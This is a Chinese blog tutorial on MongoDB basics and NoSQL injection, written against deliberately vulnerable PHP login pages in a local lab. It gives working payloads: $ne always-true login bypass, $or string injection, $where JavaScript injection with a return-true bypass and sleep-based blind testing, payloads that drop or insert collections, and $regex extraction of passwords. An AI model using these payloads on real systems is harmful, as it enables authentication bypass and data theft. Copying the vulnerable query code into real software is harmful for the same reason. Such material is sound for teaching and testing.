MONGODB 的基础 NOSQL注入基础

最新推荐文章于 2024-03-27 09:58:49 发布
最新推荐文章于 2024-03-27 09:58:49 发布
阅读量1.5k 收藏 2
点赞数 25
分类专栏: SQL注入 文章标签: mongodb 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134548592
版权

首先来学习一下nosql

这里安装就不进行介绍 只记录一下让自己了解mongodb

ubuntu 安装后 进入 /usr/bin  

./mongodb

即可进入

然后可通过 进入的url链接数据库

基本操作

show db

show dbs

show tables

use  数据库名

插入数据

db.admin.insert({json格式的数据})

例如 

db.admin.insert({'id':1,'name':admin,'passwd':admin123})

或者通过定义的方法

canshu={'id':1,'name':admin,'passwd':admin123}

db.admin.insert(canshu)

删除

db.admin.remove()

更新

db.admin.update({'name':'admin'},{$set{'id':1}})

前面是条件 后面是更新的内容

然后我们现在需要来查看 nosql的符号

条件操作符

$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=、<>
$in : in
$nin: not in
$all: all 
$or:or
$not: 反匹配(1.3.3及以上版本)
模糊查询用正则式:db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : 范围查询 { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/

解释

$gt	大于
$lte	小于等于
$in	包含
$nin	不包含
$lt	小于
$gte	大于等于
$ne	不等于
$eq	等于
$and	与
$nor	$nor在NOR一个或多个查询表达式的数组上执行逻辑运算,并选择 对该数组中所有查询表达式都失败的文档
$not	反匹配(1.3.3及以上版本),字段值不匹配表达式或者字段值不存在
$or

 知道这五个其实就OK了

SQL注入

因为这里传入的都是json格式的文件

所以首先我们来搭建一个查询网站

<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb"); //修改url
$username = $_POST['username'];  //修改集合字段
$password = $_POST['password'];

$query = new MongoDB\Driver\Query(['name' => $username, 'password' => $password]);
$result = $manager->executeQuery('test.admin', $query)->toArray();

$count = count($result);
$queryString = json_encode($result);
echo '查询结果: ' . $queryString . '<br>';

if ($count > 0) {
    foreach ($result as $user) {
        $user = (array)$user;
        echo $user;
        echo '====Login Success====<br>';
        echo 'username: ' . $user['name'] . '<br>';  //修改集合字段
        echo 'password: ' . $user['password'] . '<br>';
    }
} else {
    echo 'Login Failed';
}

 测试后是ok的 那么这里我们如何注入呢

我们首先要知道传入的语句是什么呢

'name' => $username, 'password' => $password

 其实是这个

我们构思一下 如果我们传入一个

永真注入

username[$ne]=1&password[$ne]=1

[$ne] 为 != 


那么这里传入的语句是什么呢


'name' => array('$ne'=> 1), 'password' => array('$ne'=>1)

mongodb 的查询语句 就变为了 

db.admin.find({'username':{$ne:1}, 'password':{$ne:1}})

只要username和password !=0 就都查询出来

 

这里其实是PHP特性导致的

value = 1 

传入的参数就是 1

value[$ne]

传入的参数就是 array([$ne]=>1)

 联合注入  (过时)

这里其实也是设计者的错误

我们将 查询语句

name => $username,password => $passwd

修改为

"{ username: '" + $username + "', password: '" + $password + "' }"

变成拼接模式

 当我们正常输入的时候

{username : admin,password: admin123}

查询语句就是

db.admin.find({username : 'admin',password: 'admin123'})

但是我们如果不正常查询呢

我们传入
username = admin', $or: [ {}, {'a': 'a
password = ' }]

最后获取到的数据是什么呢


db.admin.find({ name: 'admin', $or: [ {}, {'a':'a', password: '' }]})

实现了查询注入

但是这个方法现在可能都无法使用 ,现在的开发都必须要传入一个数组或者Qurey对象

JavaScript注入

mongodb支持JavaScript的脚本辅助

这里要提及mongodb的关键词 $where

$where关键词

在MONGODB中 支持使用 $where关键词进行javascrip执行

db.admin.find({ $where: "function(){return(this.name == 'admin')}" })

这是一个简单的利用 执行函数返回用户名的数据

 但是在例如直接传参的时候 就会造成注入


db.admin.find({ $where: "function(){return(this.name == $userData" })


db.admin.find({ $where: "function(){return(this.name =='a'; sleep(5000))}" })

 这里就可以查询到不该查询的内容 和 盲注

我们也测试一下

<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb");
$username = $_POST['username'];
$password = $_POST['password'];
$function = "function() {
    var name = '".$username."';
    var password = '".$password."';
    if(name == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}";

$query = new MongoDB\Driver\Query(['$where' => $function]);
$result = $manager->executeQuery('test.admin', $query)->toArray();
$count = count($result);
if ($count > 0) {
    foreach ($result as $user) {
        $user = (array)$user;
        echo '====Login Success====<br>';
        echo 'username: '.$user['name']."<br>";
        echo 'password: '.$user['password']."<br>";
    }
} else {
    echo 'Login Failed';
}
?>

 我们正常传输入

java脚本是

function() {
    var name = 'admin';
    var password = 'admin123';
    if(name == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}


然后进入数据库

db.admin.find({$where:function() {
    var name = 'admin';
    var password = 'admin123';
    if(name == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
  }
})

那么这里我们使用注入呢

我们构造万能钥匙

username=1&password=1';return true;var a='1
username=1&password=1';return true//
进入javascrip为

$function = "function() {
    var name = '1';
    var password = '1';return true;var a='1';
    if(name == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}";

美化后
$function = "function() {
    var name = '1';
    var password = '1';
    return true;
    var a='1';
    if(name == 'admin' && password == 'admin123'){
        return true;
    }else{
        return false;
    }
}";

这里可以发现 直接return ture 所以绕过了下面的判断

 

comment方法造成注入

这里的内容其实是被php官方制止的 因为很容易造成漏洞

但是如果工作量很大 难免有人选择

<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb");
$username = $_POST['username'];

$filter = ['name' => $username];
$query = new MongoDB\Driver\Query($filter);

$result = $manager->executeQuery('test.admin', $query)->toArray();
$count = count($result);

if ($count > 0) {
    foreach ($result as $user) {
        $user = (array)$user;
        echo '====Login Success====<br>';
        echo 'username: ' . $user['name'] . '<br>';
        echo 'password: ' . $user['password'] . '<br>';
    }
} else {
    echo 'Login Failed';
}
?>

 这个时候 其实我们就已经是shell的权限了 我们可以开始操作数据库

但是本地是最新的mongodb

所以出现报错


Fatal error: Uncaught MongoDB\Driver\Exception\CommandException: no such command: 'eval' in C:\Users\Administrator\Desktop\CTFcode\dir.php:9 Stack trace: #0 C:\Users\Administrator\Desktop\CTFcode\dir.php(9): MongoDB\Driver\Manager->executeCommand('admin', Object(MongoDB\Driver\Command)) #1 {main} thrown in C:\Users\Administrator\Desktop\CTFcode\dir.php on line 9

但是我们看payload其实就ok了

username=1'});db.users.drop();db.user.find({'username':'1
username=1'});db.users.insert({"username":"admin","password":123456"});db.users.find({'username':'1

 我们发现其实就是通过闭合 然后就可以执行命令了

布尔注入

<?php
$manager = new MongoDB\Driver\Manager("mongodb://127.0.0.1:27017/?compressors=disabled&gssapiServiceName=mongodb");
$username = $_POST['username'];
$password = $_POST['password'];

$query = new MongoDB\Driver\Query([
    'name' => $username,
    'password' => $password
]);

$result = $manager->executeQuery('test.admin', $query)->toArray();
$count = count($result);

if ($count > 0) {
    foreach ($result as $user) {
        $user = (array)$user;
        echo '==== Login Success ====<br>';
        echo 'Username: ' . $user['name'] . '<br>';
        echo 'Password: ' . $user['password'] . '<br>';
    }
} else {
    echo 'Login Failed';
}
?>

首先我们在已知账号的情况下可以

password[$regex]=.{6}

 通过正则匹配来获取

具体传入内容是

{
    'name':'admin',
    'password':array([$regex]=>'.{6}')

}

这里是匹配任意6个字符

进入数据库后是 

db.admin.find({'name':'admin','password':{$regex:'.{6}'}})

 

 发现实现了访问

发现超过了就没有回显了 所以这里可以拿来测试密码长度

我们要获取数字 其实就可以通过正则表达式来

db.admin.find({'name':'admin','password':{$regex:'^a'}})

db.admin.find({'name':'admin','password':{$regex:'^ad'}})

 

这里 基本的nosql注入 就实现了

双层小牛堡
关注
  • 25
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mongodb注入攻击
03-01
关于mongodb的基本安装运行操作以及php操作mongodb,请参考我以前的文章php下操作mongodb的帖子国内已经有了,但是基于php下注入攻击mongodb的文章似乎还比较少。本文是笔者在学习、查阅了大量资料后的一些总结,文中涉及的攻击手法及其知识产权全部归原作者所有,我只是大自然的搬运工。未征得笔者同意,请勿转载。php下操作mongodb大致有以下两种方式1.用mongo类中相应的方法执行增查减改比如:此时,传递进入的参数是一个数组。2.用execute方法执行字符串比如:此时,传进方法execute的参数就是字符串变量$query特别的,此时的字符串书写语法为js的书写语法。
Nosql 注入从零到一
jklbnm12的博客
09-22 2431
Nosql 注入的简介 NoSQL 注入由于 NoSQL 本身的特性和传统的 SQL 注入有所区别。使用传统的SQL注入,攻击者利用不安全的用户输入来修改或替换应用程序发送到数据库引擎的 SQL 查询语句(或其他SQL语句)。 换句话说,SQL 注入使攻击者可以在数据库中 SQL 执行命令。 与关系数据库不同,NoSQL 数据库不使用通用查询语言。NoSQL 查询语法是特定于产品的,查询是使用应用程序的编程语言编写的:PHP,JavaScript,Python,Java 等。这意味着成功的注入使攻击者不仅可
Mongodb注入
acepanhuan的博客
02-13 1173
Mongodb注入
NoSQL 注入
LYJ20010728的博客
09-17 2501
NoSQL 注入基本概念NoSQLMongoDBMemcachedRedisMongoDB 初步MongoDB 基础概念解析数据库(Database)文档(Document)集合(Collection)MongoDB 基础语法解析MongoDB 创建数据库MongoDB 创建集合MongoDB 插入文档MongoDB 更新文档update 方法save 方法MongoDB 查询文档MongoDB 与 RDBMS Where 语句的比较MongoDB AND 条件MongoDB OR 条件AND 和 OR 联
Nosql inject注入
god_Zeo的安全博客
11-28 1315
最近主要在看那个 YApi 的注入漏洞,也是一个 mongodb注入 所以来写一下这个东西,其实现在越来越常见的Nosql注入
nosqli:NoSql注入CLI工具,用于使用MongoDB查找易受攻击的网站
02-04
Nosqli当前支持Mongodbnosql注入检测。 它运行以下测试: 基于错误-注入各种字符和有效载荷,在响应中搜索已知的Mongo错误 布尔盲注入-注入具有正确/错误有效载荷的参数,并尝试确定是否存在注入 定时注入-尝试在...
服务器nosql注入
02-17
在JavaScript环境中,服务器端的NoSQL注入尤为常见,因为许多现代Web应用使用Node.js作为后端开发框架,而Node.js广泛支持MongoDBNoSQL数据库。JavaScript代码中如果没有对用户输入进行充分的过滤和转义,就可能...
硕士论文:我的硕士论文关于针对MongoDB,Redis,CouchDB和Memcached的NoSQL注入
02-04
硕士论文:我的硕士论文关于针对MongoDB,Redis,CouchDB和Memcached的NoSQL注入
nosqlinjection_wordlists:此存储库包含用于测试NoSQL注入的有效负载
02-03
1. **NoSQL注入**:NoSQL注入与传统的SQL注入类似,但针对的是非关系型数据库,如MongoDB、Cassandra、CouchDB等。它发生在应用程序不正确地过滤或转义用户输入时,允许攻击者插入自定义的NoSQL查询。 2. **MongoDB...
nosql注入
m0_68976043的博客
02-28 1498
关系型数据库 mysql oracle sqlserver非关系型数据库 key-value redis MongoDB(not only sql)
day26WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等
m0_69583059的博客
01-16 1279
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器的过程。它配备了强大的检测引擎、用于终极渗透测试仪的许多利基功能以及从数据库指纹识别、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令的各种切换。
MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
T1ngSh0w的博客
09-05 1465
MongoDB数据库注入-墨者学院-SQL手工注入漏洞测试(MongoDB数据库)详细讲解
sql漏洞注入,Oracle,MongoDB注入(15)
san3144393495的博客
04-22 393
这一对比就发现access数据比其他数据库要低一个等级,在搭建网站的时候access网站,数据会保存到网站源码下面,就在他网站源码下面,换一个网站也是access,他们是互不相干的没有关系,像我们之前提到过跨库注入,mysql下面就可能存在数据a,数据库b,就可以通过数据a获取到数据库b信息,access就没有,因为他的数据库是独立村存在的,每一个网站就是自己的,不和其它网站相关,没有任何关系。之后再猜,猜不出来了,就只能用工具去跑出来,列名实在不知道,跑出来是passwd。
15、SQL注入之Oracel、MongoDB注入
山兔的博客
06-21 1411
不同的数据库,它获取信息的注入语句是有点不一样的,如果你不知道这个网站使用的是什么类型的数据库,就一个劲的用mysql的注入语句去获取信息,那是无法获取到的,所以我们在判断出注入点的时候,你也得知道这个网站它使用的数据库是什么类型的,这样你才能够根据相关数据库的注入语句去获取信息。mongodb它的条件,它的值,在提交数据库注入查询的时候,它是列表形式查询的,键值键名提交进去的,所以我们在注入的时候要考虑到我们的语句是要写到列表里面去,要注入的话,要闭合前面后面的列表,其实就是有符号干扰我们。
一次利用XSS读取源码和Nosql注入渗透测试
Python_0011的博客
05-06 462
常规的XSS利用方式主要有窃取cookie、恶意链接、获取键盘记录、网页钓鱼、挂马等等,本次渗透首先通过XSS漏洞,利用XMLRequest发起ajax请求,实现了发起http请求的目的,并且把请求的结果返回了,通过代码审计,打开了突破的口子。后续还运用到了Nosql注入、绕过2FA验证、kdbx文件解密等等技术,渗透过程涉及很多小的知识点,充满乐趣与挑战,下面开始此次渗透之旅。
第15天:WEB漏洞-SQL注入之Oracle、mongoDB注入
cailme的博客
05-07 365
渗透测试day15
简述NoSQL注入
最新发布
2401_83799022的博客
03-27 555
​ 说明,场景可能为更新用户信息,前端传递修改的手机号、年龄等,但是后端并未对需要更新的字段进行白名单过滤,此时如果攻击者增加。格式的查询的数据交互方式让参数拼接变得难度倍增,但是并不代表没有可能。的应用程序,这样查询会更为方便,但是也具有一定的安全风险,特别是配合。数据库的兴起,安全问题也伴随着呈现。语句拼接前端不可信参数,未进行合理的编码导致。等等,为的是实现更为复杂的查询操作,比如。等字段,导致数据库信息修改,权限提升等。不等于1的用户,转换成我们熟悉的。层暴露了一个未经过滤的接口,参数。
sql 把某一列拼接_SQL注入之Pikachu靶场戏耍
weixin_39695374的博客
12-03 216
网安引领时代,弥天点亮未来0x00软文目录盲注 常规型 布尔型 延时宽字节注入报错注入0x01测试实战盲注常规型MYSQL数据库版本5.0以上有一个information_scheam表存着关于MySQL服务器所维护的所有其他数据库的信息.如数据库名,数据库的表,表栏的数据类型与访问权限等。-lucy' union select group_concat(table...
mongodb数据库怎样注入攻击
08-25
1. NoSQL注入:由于MongoDB使用的是非结构化的BSON格式,而不是SQL语句,所以传统的SQL注入攻击在MongoDB中可能无法直接应用。然而,攻击者仍然可以通过恶意数据注入来影响查询操作。例如,攻击者可以在输入中添加...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值